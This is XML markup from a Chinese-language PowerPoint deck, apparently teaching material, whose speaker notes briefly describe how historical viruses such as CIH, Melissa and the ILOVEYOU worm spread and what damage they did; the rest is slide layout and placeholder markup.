        <p:nvSpPr>
          <p:cNvPr id="208900" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14065E0D-713B-48AE-BB68-604E2C492BB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8494AA57-A776-40D2-AA2A-7A4F965A4502}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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0635284D-47EB-4382-9C0A-5B144ECED485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96DEB1DC-E6DC-434B-8470-75F391E101F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要表现在于病毒发作后，硬盘数据全部丢失，甚至主板上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中的原内容也会被彻底破坏，主机无法启动。只有更换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，或是向固定在主板上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中重新写入原来版本的程序，才能解决问题。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最早通过光盘传播</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38916" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00887D20-5A61-457E-864B-427CAE370E0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7626A8A-B0C8-466D-BC28-66FAF55F6BAC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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7230D647-117B-4721-88F7-16EFF408B1F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BACB93C-D858-4A6A-9278-C89A7987FD4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梅丽莎病毒一般通过邮件传播，邮件的标题通常为“这是给你的资料，不要让任何人看见”。一旦收件人打开邮件，病毒就会自动向用户通讯录的前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>位好友复制发送同样的邮件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>引发的大量电子邮件会阻塞电子邮件服务器，使之瘫痪。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4E05CB-6748-4052-94FB-2642DCA6956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2289A2BC-4D14-46AF-96D0-AFAC4647FCC6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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F9EDF1F7-E19D-4D05-885F-93A6DDC90EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F437FADF-A40A-42B0-B64C-B820B42AD33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发送给所有邮件用户。用自身的副本覆盖（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）扩展名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JPG,VBS,JS,JSE,CSS,WSH,SCT,HTA,MP3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的所有文件，给无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>non-VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）后缀的文件名添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扩展名。如：一个名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Satisfaction.MP3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的文件将变为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Satisfaction.MP3.VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。下一次染毒文件被点击或被激活，蠕虫将开始传播。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD443A2-B84C-44A7-A071-D553BFF52B7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910AD6-DD76-4974-A841-B3F41B18A3D9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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2EEBF666-0BC9-4DFF-958F-207D1269C98B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F5C8EDD-3A73-40BD-AAB9-4BD15ED8983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释放出一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pcihdd.sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>drivers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目录，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pcihdd.sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一个底层硬盘驱动，提高自己的优先级接替还原卡或冰点的硬盘驱动，该文件会接管冰点或者硬盘保护卡对硬盘的读写操作，这样该病毒就破解了还原系统的保护，使冰点、硬盘保护卡失效。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后访问指定的网址，这些网址只要连接就会自动下载大量的病毒与恶意插件。最可怕的是，一台中招，会通过内部网络传播全部自动重启。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51D5A9A-6D8C-4ECE-AE4F-7830A1480C1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kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="965200">
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="965200">
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="965200">
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="965200">
              <a:defRPr kumimoji="1" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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defTabSz="9652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49DA0E78-0F87-4EEC-8F50-BEE1DE1696F2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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ctrTitle" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="685800"/>
            <a:ext cx="5561013" cy="3352800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="4038600"/>
            <a:ext cx="3960813" cy="1752600"/>
          </a:xfrm>
          <a:ln w="9525">
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版副标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{219CA841-9936-4FD5-833B-49EC3E1B20EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E6B263-2CBF-4241-8A47-A3CEBE4D3091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6248400"/>
            <a:ext cx="2895600" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C562E0A0-E37B-4315-8A7C-ECDBDF6752F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F792C820-A08F-4B3F-859C-D3356EB4408B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402082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3B0B6282-959F-48CE-B71D-8AC531C77C7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B8AB5F5A-9776-4490-AFBB-6198739E929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C8CB85A-AFED-4D62-838A-D438863828B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E0B55288-EF3D-4D6E-B3D8-34FB74F292F2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386329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86600" y="533400"/>
            <a:ext cx="1905000" cy="5562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371600" y="533400"/>
            <a:ext cx="5562600" cy="5562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EA6F9740-28CE-4D52-AC53-DF8939B493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31266F21-5CAD-462A-B1E4-CBEDC23377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0F616F3-F8A7-4222-901F-837E7C4F3EDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{408F70B1-71DC-46CB-913B-A47F832DF938}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79645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1600" y="533400"/>
            <a:ext cx="7543800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="表格占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1981200"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{847F9B66-1FF8-407E-9FF0-F5092C9AB29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B067C445-FDEB-4A38-9B9B-6F8EDE9FF15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57BBAC9-0D72-4FBD-894F-0CB9136131D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DD83FE83-7D22-4841-AF89-018A20B3E70C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18439354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1371600" y="533400"/>
            <a:ext cx="7543800" cy="11430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1371600" y="1981200"/>
            <a:ext cx="3733800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="1981200"/>
            <a:ext cx="3733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44FBD8-B817-4851-8216-71F2863A74A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA955DDC-B1FB-4F92-96C7-0D9AC0A36626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EF3AF9-B9EE-4D0D-85E5-8BAF6B4F09F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{22506199-CE60-43A3-83BC-B1FCFFF44C1E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="789003155"/>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2F3AF37-5076-4775-B246-8993E28C3B1B}"/>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43EA7BBA-950A-4994-BD32-3E5F10C5B9C8}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2025/5/25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{352E03D0-AB9C-4F9B-9D61-2C3824FFDCAC}"/>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6" name="灯片编号占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
